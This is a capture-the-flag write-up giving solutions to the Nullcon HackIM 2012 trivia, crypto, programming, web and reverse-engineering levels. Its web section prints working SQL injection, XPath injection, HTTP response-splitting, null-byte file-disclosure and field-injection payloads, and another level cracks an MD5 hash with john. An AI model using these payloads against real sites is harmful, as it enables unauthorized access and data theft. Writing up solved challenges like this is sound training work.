1. Nullcon HackIM 2012 Solutions
Trivia Level 1
This operating system also refers to a 1982 science fiction film, a board game, and a song off the
Prodigy B-Side "What Evil Lurks"
Flag: android
Ref:
Trivia Level 2
This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets
with malicious intent.
Flag: evil bit
Reference: http://www.ietf.org/rfc/rfc3514.txt
Trivia Level 3
This humorous RFC of the Internet Engineering Task Force describes a communication and control
protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of
typewriters to produce the entire works of William Shakespeare.
Flag: 2795
Reference: http://www.ietf.org/rfc/rfc2795.txt
Trivia Level 4
Metasploit was originally coded for what purpose?
Flag: game
Reference: http://threatpost.com/en_us/blogs/qa-hd-moore-metasploit-disclosure-and-ethics-
052010
Trivia Level 5
Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to
compose commands.
Flag: whitespace
Reference: http://en.wikipedia.org/wiki/Whitespace_(programming_language)
2. Crypto Level 1: Ulta Pulta
Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx
iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa
Glyik
Clue: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-
computer-mirror1_VXLbh_24429.jpg"> -->
Approach: Recycled Keyboard being the hint, it pointed to a substitution cipher. Solved it by starting
with yfi = the
Flag: Windows 2000 already contains features such as the human discipline component, where the
PC can send an electric shock through the keyboard if the human does something that does not
please Windows, - Bill Gates
Other methods:
1. http://www.blisstonia.com/software/WebDecrypto/index.php
2. Reversed Keyboard
Crypto Level 2: White Noise
File: http://www.nullcon.net/challenge/data/shhhkoinahihai
Approach: Initially thought it was whitespace code. Then noticed only tabs and spaces. Wrote code
to convert them to 0 and 1.
Ruby code:
[clevel2]$ cat decode.rb
x = gets
l = x.size
i=0
decoded = ""
while i < l do
case x[i]
when ' '
print "1"
decoded = decoded + "1"
else
print "0"
decoded = decoded + "0"
end
i=i+1
end
print "n"
i=0
while i < decoded.size - 8
3. j=i+7
print decoded[i..j].to_i(2).chr
i=i+8
end
print "n"
[clevel2]$ cat shhhkoinahihai | ruby decode.rb
01000101011100100111001001101111011100100010000001001101011001010111001101110011
01100001011001110110010100111010001000000101100101101111011101010111001000100000
10100000110000101110011011100110111011101101111011100100110010000100000010011010
11101010111001101110100001000000100001001100101001000000110000101110100001000000
10011000110010101100001011100110111010000100000001100010011100000110111001101110
11000000100000010000110110100001100001011100100110000101100011011101000110010101
11001001110011001000000110000101101110011001000010000001000011011000010110111000
11011110111010000100000010100100110010101110000011001010110000101110100001000000
00001011011100111100100100000011011110110011000100000010110010110111101110101010
00111001001100101011101100110100101101111011101010111001100100000001100110011000
01101100011100000111001001000000101000001100001011100110111001101110111011011110
10001110011001000000010110100100000010011010101001100100000010010110100001000100
001100100011011100110110001100110011000000110100
Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your
Previous 30689 Passwords - MS KB 27630
Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of
Your Previous 30689 Passwords - MS KB 276304
Crypto Level 3: Base Test
Clue:
====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====
Approach: Looked like Base64. Tried Base64 and Base32 Decoding. Padding in front suggested that
we may need to reverse the string.
Ruby code:
def decodeb32(string)
hash = {
"A" => "00000",
"B" => "00001",
"C" => "00010",
"D" => "00011",
"E" => "00100",
"F" => "00101",
"G" => "00110",
"H" => "00111",
"I" => "01000",
"J" => "01001",
"K" => "01010",
"L" => "01011",
"M" => "01100",
"N" => "01101",
"O" => "01110",
4. "P" => "01111",
"Q" => "10000",
"R" => "10001",
"S" => "10010",
"T" => "10011",
"U" => "10100",
"V" => "10101",
"W" => "10110",
"X" => "10111",
"Y" => "11000",
"Z" => "11001",
"2" => "11010",
"3" => "11011",
"4" => "11100",
"5" => "11101",
"6" => "11110",
"7" => "11111",
"=" => "0"
}
decoded = ""
len = string.size - 1
(0..len).each do |i|
print hash[string[i].chr]
decoded = decoded + hash[string[i].chr]
end
print "n"
b32 = ""
(0..7).each do |s|
i = s
while i < decoded.size - 8
j = i + 7
print decoded[i..j].to_i(2).chr
b32 = b32 + "decoded[i..j].to_i(2).chr"
i = i + 8
end
print "n"
end
return b32
end
string =
"====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="
decodeb32(string)
decodeb32(string.reverse)
string = "MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======"
decodeb32(string)
Flag: duoTriGeSimalandNgiti
Crypto Level 4: Elucidate
File: http://www.nullcon.net/challenge/data/elucidate
10. "x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143x6f156
x64151x74151x6f156x77157x75154x64164x68145x72145x73165x6c164x73157
x66157x75162x77157x72153x62145x72145x67141x72144x65144x61163x6616
5x6c154x79143x6f156x63154x75163x69166x65141x6e144x61163x68141x7615
1x6e147x65154x75143x69144x61164x65144x74150x65156x6f162x6d141x6c14
3x6f165x72163x65157x66164x68145x70150x65156x6f155x65156x61"; return
file_exists($_0cd4cee5d8ae33bea2a09fe4d5698e7a); } else { return false; } }
$_37c4dfe05770cbe4a45d2ae9fa96a647=array("x66151x6c145x3156x6a160x67",
"x66151x6c145x3256x6a160x67", "x66151x6c145x3356x67151x66");
create_zip($_37c4dfe05770cbe4a45d2ae9fa96a647,
"x6d171x7a151x70146x69154x6556x7a151x70", true); ?>
From above we get the flag:
ruby-1.9.2-p180 :001 > "x6f156x6c171x62171x6f142x73145x72166x69156
x67164x68151x73143x6f156x64151x74151x6f156x77157x75154x64164
x68145x72145x73165x6c164x73157x66157x75162x77157x72153x62145
x72145x67141x72144x65144x61163x66165x6c154x79143x6f156x63154
x75163x69166x65141x6e144x61163x68141x76151x6e147x65154x75143
x69144x61164x65144x74150x65156x6f162x6d141x6c143x6f165x72163
x65157x66164x68145x70150x65156x6f155x65156x61"
=> "onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclu
siveandashavingelucidatedthenormalcourseofthephenomena"
ruby-1.9.2-p180 :002 >
References: http://www.tareeinternet.com/scripts/decrypt.php
Flag:
onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelu
cidatedthenormalcourseofthephenomena
Crypto Level5: Llun Saving Bank
Llun Saving Bank is fed up with known encryption standards to store the data. They decided to
reinvent the wheel. Can you decode the data?
Clue: Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble-
cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui
Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd
Approach: Initially was totally lost. Then noticed that by substituting some of the letters by their
previous or next alphabet, we can get some meaningful text as follows:
“Is God willing to prevent evil,but not able? Then he is NOT Omnipotent. Is He able, but NOT willing?
Then He is Malevolent. Is He Both able and Willing? Then Whence Cometh Evil? Is he Neither able
Nor Willing? Then WHY call him GOD? – Epicurusongod”
Each letter being at a binary edit distance of one, it points to steganography. Printing out the binary
of both the strings, found that only the least significant bit differs for certain letters which is
standard form of steganography especially for audio files. Writing a script, got the coded message.
11. Ruby Code:
crypted = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU
Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth
@bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor
Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"
orig = "Is God willing to prevent evil,but not able? Then he is NOT
Omnipotent. Is He able, but NOT willing? Then He is Malevolent. Is He Both
able and Willing? Then Whence Cometh Evil? Is he Neither able Nor Willing?
Then WHY call him GOD? - Epicurusongod"
len = crypted.size
binmsg = ""
(0..(crypted.size-1)).each do |i|
print "Cypted : " + crypted[i].unpack("B*").first + "n"
print "Original: " + orig[i].unpack("B*").first + "n"
binmsg = binmsg + crypted[i].unpack("B*").first[7]
end
print "Binary message: " + binmsg + "n"
print "Text message: " + [binmsg].pack("B*")
print "n"
Flag: Learn howto Hide in Plain Sight
Programming Level 1: ROTOMATA
Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw
vawwhnwer, pcum nu oeq ewllxqmqit
Clue: We only know the first 6 characters: "Men at"
Approach: From manual inspection, we found that possibly the ith character in the ciphertext differs
from the plaintext by I mod 26. By manually decoding some words and Google searching, got the
Flag.
Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in
ourselves, that we are underlings
Programming Level 2:Pascal’s Triangle
The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
Approach: In a Pascals triangle, the sum of the squares of the elements of row n equals the middle
element of row (2n − 1).
Ruby Code:
#rows = gets
rows = 1337
rows = rows.to_i / 2
12. a = Array.new
total = 0
(0..rows).each do |i|
a[i] = Array.new
(0..i).each do |j|
a[i][j] = 1 if j ==0 || i == j
a[i][j] = a[i - 1][j - 1] + a[i - 1][j] unless j ==0 || i == j
total = total + a[i][j]*a[i][j]
end
end
print total
print "n"
Flag:
43659324741884237070936006832303643114239411987772786602066543431205872166674362
33239359631257671906424254797004032326756653034333310397082007259357870623427662
43246058781866709722670564598714565665945693435649886216003262864750806978655186
22537377534356455651048425097523734881838663157063304671110082383218294453737678
74422156015835789685633070319435688289548287438365157627110284786617099968029649
7
Programming Level 3: Your Brainfuck Sir...
Debug bfcode to get the flag
File: http://www.nullcon.net/challenge/data/bfcode
Approach: Used online BF interpreter and debugger. Adding . at the end of every line gave the
required flag as output.
Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..
Programming Level 4: Substitute Problem
File: http://www.nullcon.net/challenge/data/deobfus
Ruby Code:
def trans1(x)
out = ""
cipher = " ABCDEFGHIJKLMNOPQRSTUVWXYZ...0123456789"
words = x.split(' ')
words.each do |w|
out = out + cipher[w.to_i]
end
return out
end
def trans2(x)
out = ""
map = { "ZERO"=> "00", "ONE" => "01", "TWO" => "02", "THREE"=>"03",
"FOUR"=>"04",
13. "FIVE" => "05", "SIX" =>"06", "SEVEN" => "07", "EIGHT" => "08",
"NINE"=>"09",
"TEN" => "10", "ELEVEN" => "11", "TWELVE" => "12", "THIRTEEN" =>
"13",
"FOUTEEN" =>"14","FIFTEEN" => "15", "SIXTEEN" => "16", "SEVENTEEN" =>
"17",
"EIGTEEN" => "18", "NINETEEN" => "19", "TWENTY" => "20", "TWENTYONE"
=> "21",
"TWENTYTWO" => "22", "TWENTYTHREE" => "23","TWENTYFOUR" =>"24",
"TWENTYFIVE" => "25",
"TWENTYSIX" => "26", "THIRTYEIGHT" => "38", "THIRTYFOUR" => "34"
}
words = x.split(' ')
words.each do |w|
print "Invalid " + w if map[w].nil?
out = out + map[w].to_s + " "
end
return out
end
input = gets
out = trans1(input)
print out.downcase + "n"
out = trans2(out)
print out.downcase + "n"
out = trans1(out)
print out.downcase + "n"
out = trans2(out)
print out.downcase + "n"
out = trans1(out)
print out.downcase + "n"
#out = trans1(trans2(trans1(trans2(trans1(input)))))
#print out.downcase + "n"
[plevel4]$ cat deobfus | ruby deof.rb
fouteen nine fouteen five twenty five five fouteen zero six nine twentytwo five
zero six fifteen twentyone eigteen zero twenty twentythree five fouteen twenty t
wentyfive fifteen fouteen five zero twenty twentythree five twelve twentytwo fiv
e zero six nine six twenty five five fouteen zero twenty twentythree five foutee
n twenty twentyfive fifteen fouteen five zero fouteen nine fouteen five twenty f
ive five fouteen zero twenty twentythree five twelve twentytwo five zero twenty
twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysi
x five eigteen fifteen zero six nine twentytwo five zero fouteen nine fouteen fi
ve twenty five five fouteen zero twenty eight eigteen five five zero five nine s
even eight twenty zero six nine twentytwo five zero twenty twentythree five fout
een twenty twentyfive twenty eight eigteen five five zero twentysix five eigteen
fifteen zero six nine six twenty five five fouteen zero twenty twentythree fift
een zero nineteen nine twentyfour zero twenty twentythree five fouteen twenty tw
entyfive fifteen fouteen five zero fouteen nine fouteen five twenty five five fo
uteen zero twenty eight eigteen five five zero fifteen fouteen five zero twenty
twentythree five fouteen twenty twentyfive zero six nine six twenty five five fo
uteen zero five nine seven twenty five five fouteen zero twenty twentythree five
fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen f
ifteen zero five nine seven eight twenty zero twenty twentythree five fouteen tw
enty twentyfive six nine twentytwo five zero nineteen nine twentyfour twenty fiv
e five fouteen zero six nine twentytwo five zero five nine seven twenty five fiv
e fouteen zero twenty twentythree five fouteen twenty twentyfive twenty twentyth
14. ree fifteen zero six nine twentytwo five zero five nine seven twenty five five f
outeen zero twenty twentythree fifteen zero six nine six twenty five five foutee
n zero fouteen nine fouteen five twenty five five fouteen zero fouteen nine fout
een five zero twenty twentythree five fouteen twenty twentyfive zero twenty twen
tythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix fi
ve eigteen fifteen zero fifteen fouteen five zero six fifteen twentyone twenty f
ive five fouteen zero six fifteen twentyone eigteen zero twentysix five eigteen
fifteen zero nineteen nine twentyfour twenty five five fouteen zero five nine se
ven twenty five five fouteen zero six nine six twenty five five fouteen zero twe
nty twentythree five twelve twentytwo five zero fouteen nine fouteen five zero t
wenty twentythree five fouteen twenty twentyfive six fifteen twentyone eigteen z
ero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twenty
five zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo f
ive zero twentysix five eigteen fifteen zero twenty eight nine eigteen twenty tw
entyfive five nine seven eight twenty zero twenty eight nine eigteen twenty twen
tyfive six fifteen twentyone eigteen zero twentysix five eigteen fifteen zero fi
ve nine seven twenty five five fouteen zero six nine six twenty five five foutee
n zero six nine twentytwo five zero six fifteen twentyone eigteen zero twenty tw
entythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix
five eigteen fifteen zero nineteen five twentytwo five fouteen zero five nine se
ven twenty five five fouteen zero six nine twentytwo five zero six nine twentytw
o five zero six fifteen twentyone twenty five five fouteen
14 09 14 05 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 20 23 05 14 20 25 15 14
05 00 20 23 05 12 22 05 00 06 09 06 20 05 05 14 00 20 23 05 14 20 25 15 14 05 0
0 14 09 14 05 20 05 05 14 00 20 23 05 12 22 05 00 20 23 05 14 20 25 06 09 22 05
00 26 05 18 15 00 06 09 22 05 00 14 09 14 05 20 05 05 14 00 20 08 18 05 05 00 05
09 07 08 20 00 06 09 22 05 00 20 23 05 14 20 25 20 08 18 05 05 00 26 05 18 15 0
0 06 09 06 20 05 05 14 00 20 23 15 00 19 09 24 00 20 23 05 14 20 25 15 14 05 00
14 09 14 05 20 05 05 14 00 20 08 18 05 05 00 15 14 05 00 20 23 05 14 20 25 00 06
09 06 20 05 05 14 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 06 09 22 05 00 2
6 05 18 15 00 05 09 07 08 20 00 20 23 05 14 20 25 06 09 22 05 00 19 09 24 20 05
05 14 00 06 09 22 05 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 20 23 15 00 06
09 22 05 00 05 09 07 20 05 05 14 00 20 23 15 00 06 09 06 20 05 05 14 00 14 09 1
4 05 20 05 05 14 00 14 09 14 05 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 09
22 05 00 26 05 18 15 00 15 14 05 00 06 15 21 20 05 05 14 00 06 15 21 18 00 26 05
18 15 00 19 09 24 20 05 05 14 00 05 09 07 20 05 05 14 00 06 09 06 20 05 05 14 0
0 20 23 05 12 22 05 00 14 09 14 05 00 20 23 05 14 20 25 06 15 21 18 00 14 09 14
05 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 20 08
09 18 20 25 05 09 07 08 20 00 20 08 09 18 20 25 06 15 21 18 00 26 05 18 15 00 0
5 09 07 20 05 05 14 00 06 09 06 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 20
23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 19 05 22 05 14 00 05 09 07 20 05 05
14 00 06 09 22 05 00 06 09 22 05 00 06 15 21 20 05 05 14
nineteen five four twentyone twelve fifteen twentyone nineteen twelve twentyfive
zero five nineteen three eight five twentythree zero fifteen two six twentyone
nineteen three one twenty fifteen eigteen twentyfive zero eight twentyfive sixte
en five eigteen twentytwo five eigteen two fifteen nineteen nine twenty twentyfi
ve zero one fouteen four zero sixteen eigteen fifteen twelve nine twentyfour nin
e twenty twentyfive zero thirtyeight thirtyfour zero eigteen fifteen five four t
wentyfive zero seven eigteen five five fouteen
19 05 04 21 12 15 21 19 12 25 00 05 19 03 08 05 23 00 15 02 06 21 19 03 01 20 15
18 25 00 08 25 16 05 18 22 05 18 02 15 19 09 20 25 00 01 14 04 00 16 18 15 12 0
15. 9 24 09 20 25 00 38 34 00 18 15 05 04 25 00 07 18 05 05 14
sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
Programming Level 5: A pinch of salt for your coffee, Sir?
URL: http://www.nullcon.net/challenge/plevel-5-salt.asp
Clue: password + salt = md5 hash
Approach: Obtained md5 hash for password = ‘a’ as 5e33d53d1a9511b8ddccc3c1aed830de
Created pass.txt with the following content:
a: 5e33d53d1a9511b8ddccc3c1aed830de
Bruteforced using john (version 1.7.9-jumbo) in incremental mode.
john –i –format=raw-md5 pass.txt
Loaded 1 password hash (Raw MD5 [SSE2i 10x4x3])
a399a7d (a)
Password cracked : a399a7d
Flag: 399a7d
Web Level1:
Can you view the bytes in password.asp from Me?
URL: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=test.txt
Tools Used: Google Chrome
Approach: (null byte termination file disclosure vulnerability)
1. Right click on link Me and select Inspect Element
2. Edit attribute href from “wlevel-1-proc.asp?input=test.txt” to “wlevel-1-
proc.asp?input=password.asp%00.txt”
3. Click on Me
Flag: password.asp%00.txt
Web Level 2:
Can you redirect ME to hackim.null.co.in?
16. Tools Used: Google Chrome
Approach: HTTP Response Splitting
Steps:
1. Right click on link ME and select Inspect Element
2. Edit attribute href from “wlevel-2-proc.asp?page=index.asp “ to "wlevel-2-
proc.asp?page=wlevel-2-proc.asp?page=index.asp%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20302%20OK%0d%0aLocation:%20hackim.null.co.
in"
3. Click on ME
References: http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting
Web Level 3: Login System
Clue:
<!--Debug Info: INSERT 'a99|a|a99|a@a99.com|admin:no|comment:new user' INTO USER DB FILE -
->
Approach: During register, the data is stored in DB as the above query. To bypass, register an user
with email as user@example.com|admin:yes
On Login using the above registered user, we get the following:
Welcome! You are logged in as ADMIN!
Flag: b3149ecea4628efd23d2f86e5a723472
Web Level 4: Can You Get Me all the Data?
Approach: Looked like SQL injection at first as http://www.nullcon.net/challenge/wlevel-4-
data.asp?input='or''=' gave all the data. On IRC, someone mentioned that he has been told that SQL
Injection is a waste of time for this level. So guessed this should be either XQuery or XPath Injection.
Followed steps suggested in Blind XPath Injection paper by Amit Klein
input ='or(name(//president[1])="president")or'a'='b => true => “president” exists in namespace
input ='or(name(//president[1])="people")or'a'='b => false => “people” does not exist in namespace
input ='or(name(//president[1])="india")or'a'='b => true => “india” exists in namespace
input='or(name(//name[1])="name")or'a'='b => true => “name” exists in namespace
From above, crafted the following query:
'] | //president[''or''='
Other query that also worked:
17. '] | //india[''or''='
Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
References:
1. http://hackbbs.org/article/book/wf/blind-xpath-injection.pdf
2. http://projects.webappsec.org/XPath-Injection
Web Level 5: Do You Have What IT Takes to Break into the World's
Most Secure Login System?
Approach: Certain SQL Injections are checked for and blocked by the login system. Initially thought
the flaw may be in the logging system so tried spoofing User-Agent without much success. Heard on
IRC that this level challenge is SQLi. Found that the system does not block comments /**/ . Also login
password field is limited to 10 characters with only client-side limitation which can be overcome by
using Inspect Element and Edit attribute in Google Chrome. Tried lot of different SQLi. Finally the
one which succeeded is:
Username: 'UNION/**/SELECT/**/1,'admin','doesntmatter
Password: doesntmatter
Welcome! You are logged in as ADMIN!
Flag: 47c1b025fa18ea96c33fbb6718688c0f
Reverse Engineering Level 1: Basic Test
Binary URL: http://www.nullcon.net/challenge/data/justdoit.exe
Approach: From the resource section, we find that it is a software called Autohotkey. When running,
if you press Windows + R, it automatically types in the Open field (I am using Vista). Opened
Notepad, started justdoit.exe, pressed Windows + R and then quickly clicked on the Open Notepad.
The Keystrokes went in to the Notepad and the Flag was typed.
Flag: We could talk all day about what AutoHotKey can do for an online poker player
Reverse Engineering Level 2: Ask nicely, it will give you what you
want
Binary URL: http://www.nullcon.net/challenge/data/HackIM.exe
18. Hint: Look for other paths.
Approach: Tried lot of things with OllyDBG. Tried changing Entry point by Set Origin as in Olly
without any luck.
Code may be in .rsrc segment which is not executable.
Opened PE exe file using Stud_PE (http://www.cgsoftlabs.ro/studpe.html)
Change Entry point to 0xC000 and set permissions of .rsrc segment to Read, Write And Execute and
ran HackIM.exe
Flag: AreYouHappyNow?
Reverse Engineering Level 3: null Mobile Android App
URL: http://www.nullcon.net/challenge/data/Null%20Mobile.apk
Approach: Extract apk file by renaming it to NullMobile.apk.zip WinRAR
Found code.js and junk.php javascript obfuscated code in res/raw
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a
)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('b'+e(c)+'b','g'),k[c]);return p}('6 $(){5 a=n H();u(5
i=0;i<q.r;i++){5 b=q[i];2(I b=='J')b=8.K(b);2(q.r==1)7 b;a.L(b)}7 a}6
o(a,b){a=a.v();2(8.h){u(5 i=0;i<8.h.r;i++){5 c=8.h[i];5 d=0;5
e=j;s{2(c.t){e=c.t[d]}k{e=c.M[d]}2(e){2(e.N.v()==a){2(b=='w'){2(c.t){c.O(
d)}k{c.P(d)}7 p}k{7 e}}}d++}Q(e)}}7 j}6 R(a){7 o(a,'w')}6
S(a){2(8.h){2(!o(a)){2(8.h[0].y){8.h[0].y(a,l,0)}k{8.h[0].T(a+' {
}',0)}}}7 o(a)}6 U(a,b){V="W X Y z A Z s 10 11 z A 12 s."}6 13(d,e){5
f=m;m.9=j;m.B=6(){2(f.9){f.9=j;f.3.B();f.3=l}}m.14=6(a,b){2(f.9){7
j}f.3=l;2(15.C){f.3=n C()}k{f.3=n 16("17.18")}2(f.3==l){7
j}k{f.3.19=6(){2(f.3.1a==4){f.9=j;f.D(f.3.1b,f.3.1c,f.3.1d);f.3=l}}f.9=n
1e();2(/1f/i.1g(b)){5 c=g+'?'+f.9.E();f.3.F("1h",c,p);f.3.1i("1j-
1k","1l/x-1m-1n-1o");f.3.G(a)}k{5
c=g+'?'+a+'&1p='+(f.9.E());f.3.F("1q",c,p);f.3.G(l)}7 p}}5
g=d;m.D=e||6(){}}',62,89,'||if|AJAX||var|function|return|document|updating|
|||||||styleSheets||false|else|null|this|new|getCSSRule|true|arguments|leng
th|do|cssRules|for|toLowerCase|delete||addRule|what|you|abort|XMLHttpReques
t|callback|getTime|open|send|Array|typeof|string|getElementById|push|rules|
selectorText|deleteRule|removeRule|while|killCSSRule|addCSSRule|insertRule|
mikcah|galf|Do|not|let|cannot|interfere|with|can|ajaxObject|update|window|A
ctiveXObject|Microsoft|XMLHTTP|onreadystatechange|readyState|responseText|s
tatus|responseXML|Date|post|test|POST|setRequestHeader|Content|type|applica
tion|www|form|urlencoded|timestamp|GET'.split('|'),0,{}))
Beautify using: http://jsbeautifier.org/
Flag is within the deobfuscated javascipt code.
…
19. function mikcah(a, b) {
galf = "Do not let what you cannot do interfere with what you can do."
}
…
Flag: Do not let what you cannot do interfere with what you can do.
Reverse Engineering 4
Binary URL: http://www.nullcon.net/challenge/data/script2
Tools: objdump, vi, gdb, strings, ps, cat
Steps:
Disassemble using Objdump (objdump -d ./script2)
Locate call to time
400ff3: bf 00 00 00 00 mov $0x0,%edi
400ff8: e8 43 f9 ff ff callq 400940 <time@plt>
400ffd: 48 39 c3 cmp %rax,%rbx
401000: 7d 0a jge 40100c
Change the above jge to jl (ie change 7c 0a to 7c 0a) on line 0x00001000 using vi in hex editor mode
(open binary file in vi, type :%!xxd to convert to hex view format, modify, save, type :%!xxd –r to
revert back to binary and save and exit :wq)
Run ./script2 and press CTRL+Z to put to background
find process using ps
see /proc/<pid>/cmdline
Found the following being executed:
#!/bin/sh
##########################################################################
# Title : icat - "intelligent" cat
# Author : Heiner Steven <heiner.steven@odn.de>
# Date : 1994-05-18
# Requires : gzip, zcat
# Category : File Utilities
# SCCS-Id. : @(#) icat 1.3 08/01/31
##########################################################################
# Description
#
##########################################################################
20. PN=`basename "$0"` # program name
VER='1.3'
Extensions=".Z .z .gz .cpz .tgz" # known file extensions
usage () {
echo >&2 "$PN - cat file, uncompress if necessary, $VER (stv '95)
usage: $PN -l
$PN [file ...]
The first case lists all known extensions, the other case tries
to print the given file, uncompressing it if necessary."
exit 1
}
msg () {
for line
do echo "$PN: $line" >&2
done
}
fatal () { msg "$@"; exit 1; }
while [ $# -gt 0 ]
do
case "$1" in
-l) # List known suffixes
echo $Extensions
exit 0;;
--) shift; break;; # Simulate getopt
-h) usage;;
*) break;;
esac
done
if [ $# -lt 1 ]
then # read from stdin (uncompressed)
cat
else
flagreq=0
if [ $flagreq -eq 1 ]
then
echo "Nature has neither kernel nor shell; she is everything at
once"
fi
for file
do
if [ -r "$file" ] # file does exist
then
# Try to determine decompressor based on the extension
case "$file" in
*.Z) zcat "$file";;
*.z) gzip -d -c "$file";;
*.gz|*.tgz) gzip -d -c "$file";;
*.bz2) bzip2 -d -c "$file";;
*.cpz) zcat < "$file";;
*) cat "$file";;
esac
else
# File does not exist: try to determine compressed version
if [ -r "$file".bz2 ]
21. then
bzip2 -d -c "$file"
elif [ -r "$file".gz ]
then
gzip -d -c "$file"
elif [ -r "$file".tgz ]
then
gzip -d -c "$file"
elif [ -r "$file".Z ]
then
zcat "$file"
elif [ -r "$file".z ]
then
gzip -d -c "$file"
elif [ -r "$file".cpz ]
then
zcat < "$file"
else
fatal "could not find file: $file"
fi
Err=$?
fi
done
fi
Alternate way:
1. Set ulimit to unlimited (ulimited –c unlimited), send SIGSEGV to program and force it the
dump core. You can find the script by doing strings on core.
2. Hook call to time using LD_PRELOAD technique.
Flag: Nature has neither kernel nor shell; she is everything at once
Reverse Engineering Level 5: Got Dumped :(
URL: http://www.nullcon.net/challenge/data/lol.rar
Tools Used: WinDBG, OllyDBG, metasm, vi
Steps:
The file is a crash dump file. Opened file in WinDBG and did analyze –v. The program crashed in
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [D:UsersNilanjanDocumentsDocsnullconlol.dmp]
User Mini Dump File with Full Memory: Only application data is
available
22. Symbol search path is:
srv*c:symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
Machine Name:
Debug session time: Sun Jan 8 14:38:14.000 2012 (GMT+5)
System Uptime: 0 days 0:57:47.904
Process Uptime: 0 days 0:00:21.000
.....
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(a60.73c): Access violation - code c0000005 (first/second chance not
available)
eax=0000978f ebx=00000001 ecx=a1840000 edx=82839b00 esi=00000000
edi=fffffffe
eip=deadbabe esp=0012feec ebp=0012ff30 iopl=0 nv up ei ng nz
na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010286
deadbabe ??
0:000> lm
start end module name
00400000 0040e000 Stub (no symbols)
77f10000 77f59000 gdi32 (pdb symbols)
c:symbolsgdi32.pdb740F60A99F2A417E96C387400994588D2gdi32.pdb
7c800000 7c8f6000 kernel32 (pdb symbols)
c:symbolskernel32.pdb34560E80F5C54175B208848EF863C5BD2kernel32.p
db
7c900000 7c9af000 ntdll (pdb symbols)
c:symbolsntdll.pdb1751003260CA42598C0FB326585000ED2ntdll.pdb
7e410000 7e4a1000 user32 (pdb symbols)
c:symbolsuser32.pdbD18A41B74E7F458CAAAC1847E2D8BF022user32.pdb
23. Wrote memory to file as mapped PE binary file.
0:000> .writemem Stub.bin 00400000 0040dfff
Writing e000 bytes............................
Converted to proper PE file using metasm
#No | Name | VSize | VOffset | RSize | ROffset |
Charact.
#01 | .text | 00006254 | 00001000 | 00006400 | 00000400 |
60000020
#02 | .rdata | 00001B42 | 00008000 | 00001C00 | 00006800 |
40000040
#03 | .data | 000018DC | 0000A000 | 00000E00 | 00008400 |
C0000040
#04 | .rsrc | 000001B4 | 0000C000 | 00000200 | 00009200 |
40000040
#05 | .reloc | 00000C4E | 0000D000 | 00000E00 | 00009400 |
42000040
require './metasm/metasm'
